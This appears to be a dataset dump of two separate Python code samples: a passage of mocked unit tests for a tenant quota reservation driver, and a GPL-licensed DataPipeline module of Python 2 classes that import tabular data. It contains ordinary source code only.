QuotaUsage.find_all = self.orig_QuotaUsage_find_all
QuotaUsage.find_by = self.orig_QuotaUsage_find_by
Reservation.create = self.orig_Reservation_create
QuotaUsage.create = self.orig_QuotaUsage_create
QuotaUsage.save = self.orig_QuotaUsage_save
Reservation.save = self.orig_Reservation_save
def test_get_defaults(self):
defaults = self.driver.get_defaults(resources)
self.assertEqual(CONF.max_instances_per_tenant,
defaults[Resource.INSTANCES])
self.assertEqual(CONF.max_volumes_per_tenant,
defaults[Resource.VOLUMES])
def test_get_quota_by_tenant(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=12)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quota = self.driver.get_quota_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, quota.tenant_id)
self.assertEqual(Resource.INSTANCES, quota.resource)
self.assertEqual(12, quota.hard_limit)
def test_get_quota_by_tenant_default(self):
self.mock_quota_result.all = Mock(return_value=[])
quota = self.driver.get_quota_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, quota.tenant_id)
self.assertEqual(Resource.VOLUMES, quota.resource)
self.assertEqual(CONF.max_volumes_per_tenant, quota.hard_limit)
def test_get_all_quotas_by_tenant(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=22),
Quota(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
hard_limit=15)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(22, quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(15, quotas[Resource.VOLUMES].hard_limit)
def test_get_all_quotas_by_tenant_with_all_default(self):
self.mock_quota_result.all = Mock(return_value=[])
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(CONF.max_instances_per_tenant,
quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(CONF.max_volumes_per_tenant,
quotas[Resource.VOLUMES].hard_limit)
def test_get_all_quotas_by_tenant_with_one_default(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=22)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(22, quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(CONF.max_volumes_per_tenant,
quotas[Resource.VOLUMES].hard_limit)
def test_get_quota_usage_by_tenant(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=3,
reserved=1)]
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
usage = self.driver.get_quota_usage_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, usage.tenant_id)
self.assertEqual(Resource.VOLUMES, usage.resource)
self.assertEqual(3, usage.in_use)
self.assertEqual(1, usage.reserved)
def test_get_quota_usage_by_tenant_default(self):
FAKE_QUOTA = QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)
self.mock_usage_result.all = Mock(return_value=[])
QuotaUsage.create = Mock(return_value=FAKE_QUOTA)
usage = self.driver.get_quota_usage_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, usage.tenant_id)
self.assertEqual(Resource.VOLUMES, usage.resource)
self.assertEqual(0, usage.in_use)
self.assertEqual(0, usage.reserved)
def test_get_all_quota_usages_by_tenant(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=2,
reserved=1),
QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(2, usages[Resource.INSTANCES].in_use)
self.assertEqual(1, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(1, usages[Resource.VOLUMES].in_use)
self.assertEqual(1, usages[Resource.VOLUMES].reserved)
def test_get_all_quota_usages_by_tenant_with_all_default(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0),
QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
def side_effect_func(*args, **kwargs):
return (FAKE_QUOTAS[0] if kwargs['resource'] == 'instances'
else FAKE_QUOTAS[1])
self.mock_usage_result.all = Mock(return_value=[])
QuotaUsage.create = Mock(side_effect=side_effect_func)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(0, usages[Resource.INSTANCES].in_use)
self.assertEqual(0, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(0, usages[Resource.VOLUMES].in_use)
self.assertEqual(0, usages[Resource.VOLUMES].reserved)
def test_get_all_quota_usages_by_tenant_with_one_default(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0)]
NEW_FAKE_QUOTA = QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.create = Mock(return_value=NEW_FAKE_QUOTA)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(0, usages[Resource.INSTANCES].in_use)
self.assertEqual(0, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(0, usages[Resource.VOLUMES].in_use)
self.assertEqual(0, usages[Resource.VOLUMES].reserved)
def test_check_quota_with_unlimited_quota(self):
FAKE_QUOTA_USAGE = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=-1),
Quota(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
hard_limit=-1)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTA_USAGE)
QuotaUsage.save = Mock()
Reservation.create = Mock()
delta = {'instances': 2, 'volumes': 3}
self.assertIsNone(self.driver.check_quotas(FAKE_TENANT1, resources,
delta))
def test_reserve(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.save = Mock()
Reservation.create = Mock()
# Set up the deltas with the intention that after the reserve call
# the deltas should match usage_id + 1 for both instances and volumes
delta = {'instances': 2, 'volumes': 3}
self.driver.reserve(FAKE_TENANT1, resources, delta)
for _, kw in Reservation.create.call_args_list:
self.assertEqual(kw['usage_id'] + 1, kw['delta'])
self.assertEqual(Reservation.Statuses.RESERVED, kw['status'])
def test_reserve_resource_unknown(self):
delta = {'instances': 10, 'volumes': 2000, 'Fake_resource': 123}
self.assertRaises(exception.QuotaResourceUnknown,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
delta = {'instances': 1, 'volumes': CONF.max_volumes_per_tenant + 1}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_with_usage(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
max_inst = CONF.max_instances_per_tenant
delta = {'instances': max_inst, 'volumes': 3}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_with_reserved(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
max_inst = CONF.max_instances_per_tenant
delta = {'instances': max_inst - 1, 'volumes': 2}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_but_can_apply_negative_deltas(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=10,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=50,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.save = Mock()
Reservation.create = Mock()
# Set up the deltas with the intention that after the reserve call
# the deltas should match -usage_id for both instances and volumes
delta = {'instances': -1, 'volumes': -2}
self.driver.reserve(FAKE_TENANT1, resources, delta)
for _, kw in Reservation.create.call_args_list:
self.assertEqual(-kw['usage_id'], kw['delta'])
self.assertEqual(Reservation.Statuses.RESERVED, kw['status'])
def test_commit(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=5,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=2)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=1,
status=Reservation.Statuses.RESERVED),
Reservation(usage_id=2,
delta=2,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.commit(FAKE_RESERVATIONS)
self.assertEqual(6, FAKE_QUOTAS[0].in_use)
self.assertEqual(1, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[0].status)
self.assertEqual(3, FAKE_QUOTAS[1].in_use)
self.assertEqual(0, FAKE_QUOTAS[1].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[1].status)
def test_commit_cannot_be_less_than_zero(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=-1)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=-1,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.commit(FAKE_RESERVATIONS)
self.assertEqual(0, FAKE_QUOTAS[0].in_use)
self.assertEqual(0, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[0].status)
def test_rollback(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=5,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=2)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=1,
status=Reservation.Statuses.RESERVED),
Reservation(usage_id=2,
delta=2,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.rollback(FAKE_RESERVATIONS)
self.assertEqual(5, FAKE_QUOTAS[0].in_use)
self.assertEqual(1, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.ROLLEDBACK,
FAKE_RESERVATIONS[0].status)
self.assertEqual(1, FAKE_QUOTAS[1].in_use)
self.assertEqual(0, FAKE_QUOTAS[1].reserved)
self.assertEqual(Reservation.Statuses.ROLLEDBACK,
FAKE_RESERVATIONS[1].status)
|
|
#!/usr/bin/env python
#
# DataPipeline - A data import and fitting tool
# Copyright (C) 2011 Damien Farrell
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: damien.farrell_at_ucd.ie
# Normal mail:
# Damien Farrell
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
#
import string, time, datetime
import Base, Utilities
class BaseImporter(object):
"""Base Importer class, sub-class this to define methods specific to each kind of
import format. At minimum we override the doImport method to get specific
format functionality. This class should not be instantiated directly."""
name = 'base'
def __init__(self, cp):
"""Arguments:
cp - a ConfigParser object that has been loaded in the parent app"""
Utilities.setAttributesfromConfigParser(self, cp)
if self.delimeter=='': self.delimeter=' '
elif self.delimeter=='tab': self.delimeter='\t'
return
def guessRowStart(self, lines):
"""If rowstart is not specified in config, it might be non-zero"""
s = 0
for line in lines:
if not self.checkEmptyRow(line):
s+=1
else:
self.rowstart = s
return
def checkEmptyRow(self, line):
if line.startswith('#') or line=='' or line.startswith('\r'):
return False
return True
def getRow(self, lines, row, start=None, grouped=False):
"""Return values in a row"""
#if we have repeating cols we return multiple lists
if self.ignorecomments==True and lines[row].startswith('#'):
return None
if not self.checkEmptyRow(lines[row]):
return None
if start == None:
start = self.colstart
vals = string.strip(lines[row]).split(self.delimeter)
vals = vals[start:]
if grouped == False:
return vals
else:
if self.colrepeat == 0:
return [vals]
elif self.colrepeat > 1:
return self.groupList(self.colrepeat, vals)
else:
return None
def getColumn(self, lines, col, grouped=False):
"""Return values in a column"""
vals = []
for row in range(self.rowstart, self.rowend):
if self.ignorecomments==True and lines[row].startswith('#'):
continue
rowdata = string.strip(lines[row]).split(self.delimeter)
if len(rowdata) < col+1:
continue
vals.append(rowdata[col])
if grouped == False:
return vals
else:
if self.rowrepeat == 0:
return [vals]
elif self.rowrepeat > 1:
return self.groupList(self.rowrepeat, vals)
def getColumnHeader(self, lines, grouped=False):
"""Column headers are taken from relevant row"""
if self.colheaderlabels != '':
#if a column header provided in conf file
#pad with xdata col and return it
#print self.colheaderlabels
colheader = list(self.colheaderlabels.split(','))
colheader.insert(0,'x')
return colheader
if self.colheader == '':
row = self.rowstart
else:
row = self.colheader
if self.colheaderstart != '':
start = self.colheaderstart
else:
start = self.colstart
return self.getRow(lines, row, start=start, grouped=grouped)
def getRowHeader(self, lines, grouped=False):
"""Return values in header row"""
if self.colheader == '':
col = self.colstart
else:
col = 0
return self.getColumn(lines, col, grouped)
def groupList(self, n, l, padvalue=None):
"""group a list into chunks of n size"""
return [l[i:i+n] for i in range(0, len(l), n)]
def getXYValues(self, xd, yd, start=0, xformat='', yformat=''):
"""Return a lists of floats from lists of vals whilst doing
various checks to remove errors etc."""
x=[]; y=[]
for i in range(start,len(xd)):
if i>=len(yd): break
xval = self.checkValue(xd[i], xformat)
yval = self.checkValue(yd[i], yformat)
if xval==None or yval==None:
continue
x.append(xval)
y.append(yval)
if len(x)<=1:
return None, None
return x,y
def checkValue(self, val, format=''):
"""Coerce a string to float if possible"""
#add code to handle commas in thousand separators
dec = self.decimalsymbol
if format != '':
return self.checkTime(val, format)
if dec == '.':
try:
return float(val)
except:
return None
else:
try:
return float(val.replace(".","").replace(dec,"."))
except ValueError, e:
#print e
return None
def checkTime(self, val, timeformat):
"""Coerce to a datetime object and return a value in seconds
from some reference"""
try:
dt = datetime.datetime.strptime(val,timeformat)
return dt
except ValueError, e:
print e
return None
def convertTimeValues(self, vals):
"""Convert datetime values to decimal"""
if vals == None or len(vals)<1:
return None
result=[]
ref = vals[0]
for v in vals:
delta = v-ref
result.append(delta.seconds)
return result
def checkUnicode(self, s):
"""Check for unicode string"""
try:
s.decode('ascii')
except UnicodeDecodeError:
s = unicode(s)
return s
def doImport(self, lines):
"""Should be overrriden"""
return
class DatabyColImporter(BaseImporter):
"""This importer handles data formatted in columns with common x values
in a specified column, it also handles multiple sets of data grouped
in evenly spaced distances down each column"""
name = 'databycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
xdata = self.getRowHeader(lines,grouped=True)
#print xdata
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
if xdata == None:
return
#print header
for col in range(self.colstart+1, self.colend):
#print col, header
coldata = self.getColumn(lines, col, grouped=True)
#print xdata, coldata
if coldata == None: continue
for xd,yd in zip(xdata,coldata):
if len(xd)<=1 or len(yd)<=1: continue
if self.colheaderlabels == '':
name = yd[0]
else:
name = header[col]
x,y = self.getXYValues(xd,yd)
data[name] = [x,y]
return data
class DatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with common x values
along the top (or specified in a specific row), it also handles
multiple sets of data grouped in evenly spaced distances along the row"""
name = 'databyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
self.guessRowStart(lines)
xdata = self.getColumnHeader(lines,grouped=True)
if xdata == None:
return
if self.rowend == 0:
self.rowend=len(lines)
for row in range(self.rowstart+1, self.rowend):
if row>=len(lines):
break
rowdata = self.getRow(lines,row,grouped=True)
#print xdata, rowdata
if rowdata == None: continue
for xd,yd in zip(xdata,rowdata):
#print xd, yd
if len(xd)<=1 or len(yd)<=1: continue
name = yd[0]
x,y = self.getXYValues(xd[1:],yd[1:])
data[name] = [x,y]
return data
class PairedDatabyColImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)+1
i=0
for col in range(self.colstart, self.colend):
coldata = self.getColumn(lines, col, grouped=True)
name = header[i]
for xyd in coldata:
x = xyd[1:len(xyd):2]
y = xyd[2:len(xyd):2]
data[name] = [x,y]
i+=1
return data
class PairedDatabyDoubleColImporter(BaseImporter):
name = 'paireddatabydoublecolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
i=0
for col in range(self.colstart, self.colend, 2):
x = self.getColumn(lines, col, grouped=True)[0]
y = self.getColumn(lines, col+1, grouped=True)[0]
name = header[i]
data[name] = [x,y]
i+=2
return data
class PairedDatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
for row in range(self.rowstart+1, self.rowend):
if row>=len(lines):
break
rowdata = self.getRow(lines,row, grouped=True)
for xyd in rowdata:
name = xyd[0]
x = xyd[1:len(xyd):2]
y = xyd[2:len(xyd):2]
data[name] = [x,y]
return data
class PairedDatabyDoubleRowImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabydoublerow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getRowHeader(lines)
i=0
for row in range(self.rowstart, self.rowend, 2):
if row>=len(lines):
break
x = self.getRow(lines,row, grouped=True)[0]
y = self.getRow(lines,row+1, grouped=True)[0]
name = header[i]
data[name] = [x,y]
i+=2
return data
class GroupedDatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with multiple independent x values in
each column, each dataset is then repeated in groups every x rows, specified in
the rowrepeat option. The importer therefore returns dictionary with multiple sets of
x-y values for each label/dataset"""
name = 'groupeddatabyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
#assumes the column header has labels for each set of xy vals
labels = self.getColumnHeader(lines)
print labels
if self.rowend == 0:
self.rowend=len(lines)
if self.colend == 0:
self.colend = len(labels)
step = self.rowrepeat
for d in range(1, self.rowrepeat):
for row in range(self.rowstart, self.rowend, step):
if row>=len(lines):
break
xdata = self.getRow(lines, row)
rowdata = self.getRow(lines, row+d)
name = rowdata[0]
if not data.has_key(name):
data[name] = {}
for v in zip(labels,xdata,rowdata)[1:]:
label = v[0]
x = self.checkValue(v[1])
y = self.checkValue(v[2])
if x==None or y==None:
continue
if not data[name].has_key(label):
data[name][label]=[]
l = data[name][label]
l.append((x,y))
#reformat paired vals into x and y lists
for d in data:
for lbl in data[d]:
data[d][lbl] = zip(*data[d][lbl])
return data
class GroupedDatabyColImporter(BaseImporter):
"""This importer handles data formatted in cols with multiple independent x values in
each row, each dataset is then repeated in groups every x columns, specified in
the colrepeat option. The importer therefore returns dictionary with multiple sets of
x-y values for each label/dataset"""
name = 'groupeddatabycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
#assumes the row header has labels for each set of xy vals
if self.rowend == 0:
self.rowend=len(lines)
labels = self.getRowHeader(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
grouplen = len(self.getColumnHeader(lines, grouped=True)[0])
step = self.colrepeat
for d in range(1,grouplen):
for col in range(self.colstart, self.colend, step):
xdata = self.getColumn(lines, col)
coldata = self.getColumn(lines, col+d)
name = coldata[0]
if not data.has_key(name):
data[name] = {}
#print name, xdata,coldata
for v in zip(labels,xdata,coldata)[1:]:
label = v[0]
x = self.checkValue(v[1])
y = self.checkValue(v[2])
if x==None or y==None:
continue
if not data[name].has_key(label):
data[name][label]=[]
l = data[name][label]
l.append((x,y))
#reformat paired vals into x and y lists
#by convention we put secondary labels into nested dicts
for d in data:
for lbl in data[d]:
data[d][lbl] = zip(*data[d][lbl])
return data
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.